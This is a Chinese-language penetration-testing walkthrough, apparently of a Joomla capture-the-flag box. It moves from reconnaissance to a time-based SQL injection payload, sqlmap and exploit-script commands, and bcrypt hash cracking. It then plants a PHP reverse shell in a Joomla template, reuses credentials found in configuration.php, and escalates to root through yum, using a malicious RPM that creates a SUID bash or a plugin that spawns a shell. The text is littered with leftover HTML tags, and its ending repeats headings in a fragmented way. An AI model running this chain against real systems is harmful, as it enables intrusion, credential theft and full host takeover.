Joomla CMS渗透测试实战：从SQL注入到权限提升<\/h1>

1. 信息收集阶段<\/h2>

1.1 端口扫描<\/h3>

使用Rustscan或Nmap扫描目标主机，发现开放端口：<\/p>

22 (SSH)<\/li>
80 (HTTP - Joomla CMS)<\/li>

3306 (MySQL)<\/li> <\/ul>

1.2 Web应用识别<\/h3>

访问80端口发现Joomla CMS运行中：<\/p>

检查robots.txt<\/code>文件，发现15个条目<\/li>
发现公开的\/administrator<\/code>管理面板<\/li>

使用whatweb<\/code>或Wig<\/code>工具确认CMS类型<\/li>
<\/ul>
1.3 版本识别<\/h3>
通过以下方法确定Joomla版本：<\/p>

访问特定文件：

http:\/\/<IP>\/administrator\/manifests\/files\/joomla.xml<\/code><\/li>
http:\/\/<IP>\/language\/en-GB\/en-GB.xml<\/code><\/li>
<\/ul>
<\/li>
检查\/LICENSE.txt<\/code>和\/README.txt<\/code>文件<\/li>
使用joomscan<\/code>工具：
joomscan -u http:\/\/<IP>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
2. 漏洞利用阶段<\/h2>
2.1 SQL注入漏洞利用<\/h3>
发现Joomla存在"list[fullordering]"参数盲SQL注入漏洞：<\/p>


手动验证漏洞：<\/p>
http:\/\/IP\/index.php?option=<\/span>com_fields&view=<\/span>fields&layout=<\/span>modal&list[<\/span>fullordering]=(<\/span>SELECT * FROM (<\/span>SELECT(<\/span>SLEEP(<\/span>5)))<\/span>GDiu)<\/span>
<\/span><\/span><\/code><\/pre><\/li>

使用sqlmap自动化利用：<\/p>
sqlmap -u "http:\/\/IP\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent --dbs -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre><\/li>

使用专用利用脚本：<\/p>
git clone https:\/\/github.com\/stefanlucas\/Exploit-Joomla.git
<\/span><\/span>cd Exploit-Joomla
<\/span><\/span>python joomblah.py http:\/\/<IP>
<\/span><\/span><\/code><\/pre>获取到fb9j5_users<\/code>表中的用户凭证（用户名jonah和密码哈希）<\/p>
<\/li>
<\/ol>
2.2 哈希破解<\/h3>
使用john或在线服务破解bcrypt哈希：<\/p>
echo '$2y$10$0veO\/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'<\/span> > hash
<\/span><\/span>john --format=<\/span>bcrypt hash
<\/span><\/span><\/code><\/pre>3. 获取Web Shell<\/h2>
3.1 登录管理面板<\/h3>
使用破解的凭证登录Joomla管理面板：<\/p>

访问http:\/\/IP\/administrator<\/code><\/li>
输入用户名jonah和破解的密码<\/li>
<\/ul>
3.2 修改模板获取反向Shell<\/h3>


导航到模板管理：<\/p>

扩展 > 模板 > 模板<\/li>
选择Protostar模板（默认模板）<\/li>
<\/ul>
<\/li>

编辑index.php文件：<\/p>

替换内容为PHP反向Shell代码（如PentestMonkey的）<\/li>
修改IP和端口参数<\/li>
保存更改<\/li>
<\/ul>
<\/li>

触发反向Shell：<\/p>

访问http:\/\/IP\/templates\/protostar\/index.php<\/code><\/li>
或使用curl请求<\/li>
本地监听对应端口获取Shell<\/li>
<\/ul>
<\/li>
<\/ol>
4. 权限提升<\/h2>
4.1 获取数据库凭证<\/h3>
检查Joomla配置文件获取数据库密码：<\/p>
cat \/var\/www\/html\/configuration.php
<\/span><\/span><\/code><\/pre>尝试使用相同密码SSH登录用户jjameson：<\/p>
ssh jjameson@IP
<\/span><\/span># 或<\/span>
<\/span><\/span>su jjameson
<\/span><\/span><\/code><\/pre>4.2 利用Yum提权<\/h3>
发现jjameson用户可以运行\/usr\/bin\/yum<\/code>，利用GTFOBins方法：<\/p>
方法一：创建恶意RPM包<\/h4>


创建执行命令的RPM包：<\/p>
TF=<\/span>$(<\/span>mktemp -d)<\/span>
<\/span><\/span>echo 'id'<\/span> > $TF\/x.sh
<\/span><\/span>fpm -n x -s dir -t rpm -a all --before-install $TF\/x.sh $TF
<\/span><\/span><\/code><\/pre><\/li>

传输并安装RPM包：<\/p>
sudo yum localinstall -y a-1.0-1.noarch.rpm
<\/span><\/span><\/code><\/pre><\/li>

创建SUID bash：<\/p>
TF=<\/span>$(<\/span>mktemp -d)<\/span>
<\/span><\/span>echo 'cp \/bin\/bash \/tmp\/bash; chmod +s \/tmp\/bash'<\/span> > $TF\/x.sh
<\/span><\/span>fpm -n x -s dir -t rpm -a all --before-install $TF\/x.sh $TF
<\/span><\/span>sudo yum localinstall -y x-1.0-1.noarch.rpm
<\/span><\/span>\/tmp\/bash -p
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
方法二：加载自定义插件<\/h4>
TF=<\/span>$(<\/span>mktemp -d)<\/span>
<\/span><\/span>cat >$TF\/x<<EOF
<\/span><\/span><\/span>[main]
<\/span><\/span><\/span>plugins=1
<\/span><\/span><\/span>pluginpath=$TF
<\/span><\/span><\/span>pluginconfpath=$TF
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span>cat >$TF\/y.conf<<EOF
<\/span><\/span><\/span>[main]
<\/span><\/span><\/span>enabled=1
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span>cat >$TF\/y.py<<EOF
<\/span><\/span><\/span>import os
<\/span><\/span><\/span>import yum
<\/span><\/span><\/span>from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
<\/span><\/span><\/span>requires_api_version='2.1'
<\/span><\/span><\/span>def init_hook(conduit):
<\/span><\/span><\/span>    os.execl('\/bin\/sh','\/bin\/sh')
<\/span><\/span><\/span>EOF<\/span>
<\/span><\/span>
<\/span><\/span>sudo yum --enableplugin=<\/span>y
<\/span><\/span><\/code><\/pre>5. 总结<\/h2>
本渗透测试流程涵盖了：<\/p>

信息收集与版本识别<\/li>
SQL注入漏洞利用<\/li>
哈希破解与凭证重用<\/li>
Web Shell获取<\/li>
权限提升技术<\/li>
<\/ol>
关键点：<\/p>

仔细检查robots.txt和配置文件<\/li>
利用特定版本的已知漏洞<\/li>
凭证重用是横向移动的有效方法<\/li>
查找sudo权限以进行权限提升<\/li>
<\/ul>

Joomla CMS渗透测试实战：从SQL注入到权限提升<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞利用阶段<\/h2>

3. 获取Web Shell<\/h2>

4. 权限提升<\/h2>

4.2 利用Yum提权<\/h3> 发现jjameson用户可以运行\/usr\/bin\/yum<\/code>，利用GTFOBins方法：<\/p>

4.2 利用Yum提权<\/h3>
发现jjameson用户可以运行`\/usr\/bin\/yum<\/code>，利用GTFOBins方法：<\/p>`